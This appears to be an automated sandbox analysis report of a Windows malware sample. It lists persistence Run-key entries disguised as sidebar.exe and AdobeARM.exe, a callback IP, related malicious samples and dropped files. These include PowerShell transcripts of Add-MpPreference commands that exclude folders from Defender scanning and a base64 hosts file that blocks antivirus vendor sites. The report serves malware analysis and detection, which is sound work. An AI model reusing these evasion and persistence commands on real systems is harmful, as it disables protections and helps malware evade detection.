19:11:56AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run sidebar C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
19:12:05AutostartRun: HKCU64\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe
19:12:19AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run sidebar C:\Users\user\AppData\Roaming\Microsoft\sidebar.exe
19:12:27AutostartRun: HKCU\Software\Microsoft\Windows\CurrentVersion\Run AdobeARM C:\Users\user\AppData\Roaming\Microsoft\AdobeARM.exe

Joe Sandbox View / Context

IPs

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
185.112.83.96mGFEIH91A8.exeGet hashmaliciousBrowse
  • 185.112.83.96:20000/callback

Domains

No context

ASN

MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
SUPERSERVERSDATACENTERRUvk8A1dXh5C.exeGet hashmaliciousBrowse
  • 185.233.81.115
GahImDA8DA.exeGet hashmaliciousBrowse
  • 185.233.81.115
prkVkqYIwv.exeGet hashmaliciousBrowse
  • 185.233.81.115
P42zLwaJQk.exeGet hashmaliciousBrowse
  • 185.233.81.115
9ro85QVN0F.exeGet hashmaliciousBrowse
  • 185.233.81.115
Mc7TWWp1Vp.exeGet hashmaliciousBrowse
  • 185.233.81.115
sbxGIUIhRd.exeGet hashmaliciousBrowse
  • 185.233.81.115
6zsU4O4WHq.exeGet hashmaliciousBrowse
  • 185.233.81.115
urMpgNNXPM.exeGet hashmaliciousBrowse
  • 185.233.81.115
zmbGUZTICp.exeGet hashmaliciousBrowse
  • 185.233.81.115
tijXCZsbGe.exeGet hashmaliciousBrowse
  • 185.188.183.61
K5CrmTWqYm.exeGet hashmaliciousBrowse
  • 185.112.83.97
JBtjAS1TGq.exeGet hashmaliciousBrowse
  • 185.188.183.61
eIxMVDoQF3.exeGet hashmaliciousBrowse
  • 185.233.81.115
PPsa8TXVuy.exeGet hashmaliciousBrowse
  • 185.233.81.115
JV4ILFxpDY.exeGet hashmaliciousBrowse
  • 185.233.81.115
gLD9IA2G4A.exeGet hashmaliciousBrowse
  • 185.233.81.115
U3E7zMaux2.exeGet hashmaliciousBrowse
  • 185.233.81.115
0Cjy7Lkv1A.exeGet hashmaliciousBrowse
  • 185.233.81.115
emPJndhuvA.exeGet hashmaliciousBrowse
  • 185.233.81.115

JA3 Fingerprints

No context

Dropped Files

No context

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:modified
Size (bytes):64
Entropy (8bit):0.34726597513537405
Encrypted:false
SSDEEP:3:Nlll:Nll
MD5:446DD1CF97EABA21CF14D03AEBC79F27
SHA1:36E4CC7367E0C7B40F4A8ACE272941EA46373799
SHA-256:A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF
SHA-512:A6D754709F30B122112AE30E5AB22486393C5021D33DA4D1304C061863D2E1E79E8AEB029CAE61261BB77D0E7BECD53A7B0106D6EA4368B4C302464E3D941CF7
Malicious:false
Preview: @...e...........................................................
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4fx1ezon.lgh.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4pie02pg.wgf.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5uqrqs4k.34i.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ab5jticm.dks.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_amblrihn.2wj.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_drkkekrp.vde.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_eovqy115.iwl.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_hm5i3shc.tba.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_iaxyhgqf.de5.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kwaaxnaf.rts.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_kzwl01ox.zis.ps1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_pgos0k0z.2gr.psm1
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:very short file (no magic)
Category:dropped
Size (bytes):1
Entropy (8bit):0.0
Encrypted:false
SSDEEP:3:U:U
MD5:C4CA4238A0B923820DCC509A6F75849B
SHA1:356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:false
Preview: 1
C:\Users\user\Desktop\hosts.bak. (copy)
Process:C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):8944
Entropy (8bit):5.510727034396864
Encrypted:false
SSDEEP:96:ER9pkfrIrb7ZZAY78Am2NXk/xNFNKNFNUYj4MEHHuoPYo68uXBpkRYnO3rsyZuZo:3IYY18WJ8A3kkZeN
MD5:7EA0FCED249EA6AF785C5BED13F34336
SHA1:175059CCA534954759EDFD57BE79BE64D709004C
SHA-256:18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
SHA-512:D952C7B68C9ABF550FF44DAEAE0213C55FA6F7C6290415C810825890857D60536F2BC66FC97E9621C0720D114BEF38913E0EED93EFA68219F9B5F729853A4D84
Malicious:false
Preview: CgkJMTI3LjAuMC4xIGxvY2FsaG9zdAoJCTEyNy4wLjAuMSByYWRzLm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdGhyZWF0ZXhwZXJ0LmNvbQoJCTEyNy4wLjAuMSB2aXJ1c3NjYW4uam90dGkub3JnCgkJMTI3LjAuMC4xIHNjYW5uZXIubm92aXJ1c3RoYW5rcy5vcmcKCQkxMjcuMC4wLjEgdmlyc2Nhbi5vcmcKCQkxMjcuMC4wLjEgc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIHVwZGF0ZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgY3VzdG9tZXIuc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIG1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdXMubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBtYXN0Lm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgZGlzcGF0Y2gubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBkb3dubG9hZC5tY2FmZWUuY29tCgkJMTI3LjAuMC4xIHNvcGhvcy5jb20KCQkxMjcuMC4wLjEgc3ltYW50ZWNsaXZldXBkYXRlLmNvbQoJCTEyNy4wLjAuMSBsaXZldXBkYXRlLnN5bWFudGVjbGl2ZXVwZGF0ZS5jb20KCQkxMjcuMC4wLjEgc2VjdXJpdHlyZXNwb25zZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgdmlydXNsaXN0LmNvbQoJCTEyNy4wLjAuMSBmLXNlY3VyZS5jb20KCQkxMjcuMC4wLjEga2FzcGVyc2t5LmNvbQoJCTEyNy4wLjAuMSBrYXNwZXJza3ktbGFicy5jb20KCQkxMjcuMC4wLjEgYXZwLmNvbQoJCTEyNy4wLjAuMSBuZXR3b3JrYXNzb2NpYXRlcy5jb20KCQkxMjcuMC4wLjEgY2EuY29tCgkJMTI3LjAuMC4xIG15LWV0
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.9GYwnzwR.20220114191133.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):5555
Entropy (8bit):5.3807331752623755
Encrypted:false
SSDEEP:96:BZjhONyqDo1ZnZahONyqDo1Z0l3tjZkhONyqDo1Zgo99RZu:d
MD5:1D25826DC4C810920BB7043A30AE63D2
SHA1:436CD6DB47BD2FA18FD9894FB555CA85D0691F6C
SHA-256:BC2F4B75059261F23D47FA9576994D2AA1BD7A7C6229247F806D0650832F3282
SHA-512:57AEA9D43EF3EE117F1A473E8BA48953A946963500CAD80A11DC042F046ED80F3C6C2B838B4D8AD5DB3DF3719C5C91A3C74442490BE9EEC57A18EC85E9BFB799
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114191134..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114191134..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..**********************..Windows PowerShell transcript start..Start time: 20220114191540..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.Gl0sshOE.20220114191151.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):3234
Entropy (8bit):5.36056988674478
Encrypted:false
SSDEEP:96:BZmhONlaqDo1ZYZrhONlaqDo1ZtAUU5Zj:r4T
MD5:3290B019E42A1E78B3283DD28F0661C3
SHA1:D42E3457C990593097D757AB2D3B0773CC11BB18
SHA-256:4DDD8C0735832D92EA6A6ACFD946E21B09F294D6BA9EF26CE80990171A30AF82
SHA-512:7EC35D5E28662E72080E0974131623FFE54F0F3B4A90478638FB06A66A5BA4ED07E48874B26F4EF37FFE7C9EE9E5CAC5B6015BA02174CABEC171B5564C603000
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114191153..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 3200..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114191153..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..**********************..Windows PowerShell transcript start..Start time: 20220114191552..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.IZ24yRiA.20220114191200.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):3234
Entropy (8bit):5.361420377712193
Encrypted:false
SSDEEP:48:BZJvhOoOmN7JqDYB1ZxN1ZyvhOoOmN7JqDYB1ZwvtcNG+3DtcNG+3DtcNG+3UZZD:BZFhONWqDo1ZRZOhONWqDo1ZwAUUEZl
MD5:A8930FE14D4FC2754F54AEFE62DFDCE6
SHA1:56E5460F3F9016DE19C236FC5227B22EE10C8847
SHA-256:86553318C3C4409CC0D5D12D87B22D66E6227F6280DCE7B1AA73A9AC54865CA2
SHA-512:64B21B418DA6B2EB49474577134EF2D591982CA2401FFAD79BA8B96B2C11184BA56B963825E4CA90AA101B5FDDAA96686E698875619968049825D934DEB0D9D2
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114191200..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..Process ID: 5572..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114191200..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Local\Temp..**********************..Windows PowerShell transcript start..Start time: 20220114191618..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.PhAlNio2.20220114191140.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):5655
Entropy (8bit):5.3705714673168155
Encrypted:false
SSDEEP:96:BZXhONAcqDo1ZthZQhONAcqDo1ZQo+wjZ0yhONAcqDo1ZflggZZa:Ni
MD5:2BB66BADA2AA66EBFB5A113905A90C49
SHA1:2C3334B7D66F07C03644215E467F083AD5D89238
SHA-256:704D02101792089CDB8C56257196B1A2ED153AA4AA9EA3558E6C64707A6025F4
SHA-512:D99076FAFE53C0F1E45BE7AD377F781FB5A01A12844E1D058C1D80C267E41310AD05C92443889D55E67415C83225087C5F4A60DCCA2D54C633F3F148B3F58998
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114191141..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 5616..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114191141..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..**********************..Windows PowerShell transcript start..Start time: 20220114191520..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros
C:\Users\user\Documents\20220114\PowerShell_transcript.358075._bhdDFjc.20220114191205.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):3291
Entropy (8bit):5.3500089296848365
Encrypted:false
SSDEEP:96:BZWhONAlqDo1ZIhZ1hONAlqDo1ZadZZmZs:+
MD5:2F603ABDABD1B16AAE8EFAAF1013FDA8
SHA1:C83105F78E3290BAB49329B87CA417BA3CD00081
SHA-256:BE7CC110A610AE0A60E00E8ABD5A41177CA779EB47E02284D1F89ED7F8DC8DD8
SHA-512:290757A7D4DA286425E06C38C56B92324629CB9CB56CD3BC7230836B55CBAF9E5BC6290E74A15B486743FE9C5E529349A0176BBDCE3078B1B1D856954E716DFA
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114191207..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 1068..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114191207..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..**********************..Windows PowerShell transcript start..Start time: 20220114191617..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros
C:\Users\user\Documents\20220114\PowerShell_transcript.358075.modYJzHz.20220114191155.txt
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:UTF-8 Unicode (with BOM) text, with CRLF line terminators
Category:dropped
Size (bytes):3291
Entropy (8bit):5.351849438556751
Encrypted:false
SSDEEP:96:BZ7hONABqDo1Z9hZXhONABqDo1Z1dZZkZF:u
MD5:541EBD96FE5F89B568C4F516BD606AED
SHA1:4565038A42D265855BEA5C8F5D78B7C39781FFA6
SHA-256:1A74BF462436C37C738EBE17DCD53254BBB84F2DAE22BC6C03C079E5B541E825
SHA-512:8E84045720D67948328E4820952BD4C8DC1A5A7B0D5252FECFF5576B3AA7F9C807E1CEEC40A84D31916433A7241E878D1A8A8DDC46C137884BD8134C358D893B
Malicious:false
Preview: .**********************..Windows PowerShell transcript start..Start time: 20220114191156..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Microsoft Windows NT 10.0.17134.0)..Host Application: powershell -Command Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..Process ID: 2924..PSVersion: 5.1.17134.1..PSEdition: Desktop..PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.17134.1..BuildVersion: 10.0.17134.1..CLRVersion: 4.0.30319.42000..WSManStackVersion: 3.0..PSRemotingProtocolVersion: 2.3..SerializationVersion: 1.1.0.1..**********************..**********************..Command start time: 20220114191156..**********************..PS>Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Microsoft..**********************..Windows PowerShell transcript start..Start time: 20220114191602..Username: computer\user..RunAs User: computer\user..Configuration Name: ..Machine: 358075 (Micros
C:\Windows\System32\drivers\etc\hosts
Process:C:\Users\user\Desktop\5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File Type:ASCII text, with very long lines, with no line terminators
Category:dropped
Size (bytes):8944
Entropy (8bit):5.510727034396864
Encrypted:false
SSDEEP:96:ER9pkfrIrb7ZZAY78Am2NXk/xNFNKNFNUYj4MEHHuoPYo68uXBpkRYnO3rsyZuZo:3IYY18WJ8A3kkZeN
MD5:7EA0FCED249EA6AF785C5BED13F34336
SHA1:175059CCA534954759EDFD57BE79BE64D709004C
SHA-256:18584FE64395B0D826EA692E83B27B4533C47E32097D94269C48F5D19713E8B4
SHA-512:D952C7B68C9ABF550FF44DAEAE0213C55FA6F7C6290415C810825890857D60536F2BC66FC97E9621C0720D114BEF38913E0EED93EFA68219F9B5F729853A4D84
Malicious:true
Preview: CgkJMTI3LjAuMC4xIGxvY2FsaG9zdAoJCTEyNy4wLjAuMSByYWRzLm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdGhyZWF0ZXhwZXJ0LmNvbQoJCTEyNy4wLjAuMSB2aXJ1c3NjYW4uam90dGkub3JnCgkJMTI3LjAuMC4xIHNjYW5uZXIubm92aXJ1c3RoYW5rcy5vcmcKCQkxMjcuMC4wLjEgdmlyc2Nhbi5vcmcKCQkxMjcuMC4wLjEgc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIHVwZGF0ZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgY3VzdG9tZXIuc3ltYW50ZWMuY29tCgkJMTI3LjAuMC4xIG1jYWZlZS5jb20KCQkxMjcuMC4wLjEgdXMubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBtYXN0Lm1jYWZlZS5jb20KCQkxMjcuMC4wLjEgZGlzcGF0Y2gubWNhZmVlLmNvbQoJCTEyNy4wLjAuMSBkb3dubG9hZC5tY2FmZWUuY29tCgkJMTI3LjAuMC4xIHNvcGhvcy5jb20KCQkxMjcuMC4wLjEgc3ltYW50ZWNsaXZldXBkYXRlLmNvbQoJCTEyNy4wLjAuMSBsaXZldXBkYXRlLnN5bWFudGVjbGl2ZXVwZGF0ZS5jb20KCQkxMjcuMC4wLjEgc2VjdXJpdHlyZXNwb25zZS5zeW1hbnRlYy5jb20KCQkxMjcuMC4wLjEgdmlydXNsaXN0LmNvbQoJCTEyNy4wLjAuMSBmLXNlY3VyZS5jb20KCQkxMjcuMC4wLjEga2FzcGVyc2t5LmNvbQoJCTEyNy4wLjAuMSBrYXNwZXJza3ktbGFicy5jb20KCQkxMjcuMC4wLjEgYXZwLmNvbQoJCTEyNy4wLjAuMSBuZXR3b3JrYXNzb2NpYXRlcy5jb20KCQkxMjcuMC4wLjEgY2EuY29tCgkJMTI3LjAuMC4xIG15LWV0
\Device\Null
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with CRLF line terminators
Category:dropped
Size (bytes):466
Entropy (8bit):4.892440045701878
Encrypted:false
SSDEEP:12:IStfsj/zRLV85+VuIHSk/ko+jLbdhFp+9Hv:ntQF5utk/ko+3bdhy
MD5:EC0CD8FB16185F3892DD2C39D6FC2FE9
SHA1:53FB6A2E739DA030FE1D1BBFB9481E0CDE1765F7
SHA-256:0183B25F759F83A5F6F6330B9AFA0078E6B23BD0081CFAD7ACD7925976DE392F
SHA-512:9C25E6DD2B9D35C0DCB8AFB4B8F431BE5C6D1A7AAD75B426E4FD52DDBAAF00186FF913123957E8203EDA1880158FB551B4816C9628D320D8893E729F93EC74B0
Malicious:false
Preview: Add-MpPreference : You don't have enough permissions to perform the requested operation...At line:1 char:1..+ Add-MpPreference -ExclusionPath C:\Users\user\AppData\Roaming\Micros .....+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~.. + CategoryInfo : NotSpecified: (MSFT_MpPreference:root\Microsoft\...FT_MpPreference) [Add-MpPreference], .. CimException.. + FullyQualifiedErrorId : HRESULT 0xc0000142,Add-MpPreference.. ..

Static File Info

General

File type:PE32+ executable (GUI) x86-64 (stripped to external PDB), for MS Windows
Entropy (8bit):7.8679927345645195
TrID:
  • Win64 Executable (generic) (12005/4) 74.80%
  • Generic Win/DOS Executable (2004/3) 12.49%
  • DOS Executable Generic (2002/1) 12.47%
  • VXD Driver (31/22) 0.19%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.04%
File name:5641e24e22ccd259f18585ed2cbbaf6be3b39a04b3c7e.exe
File size:1843200
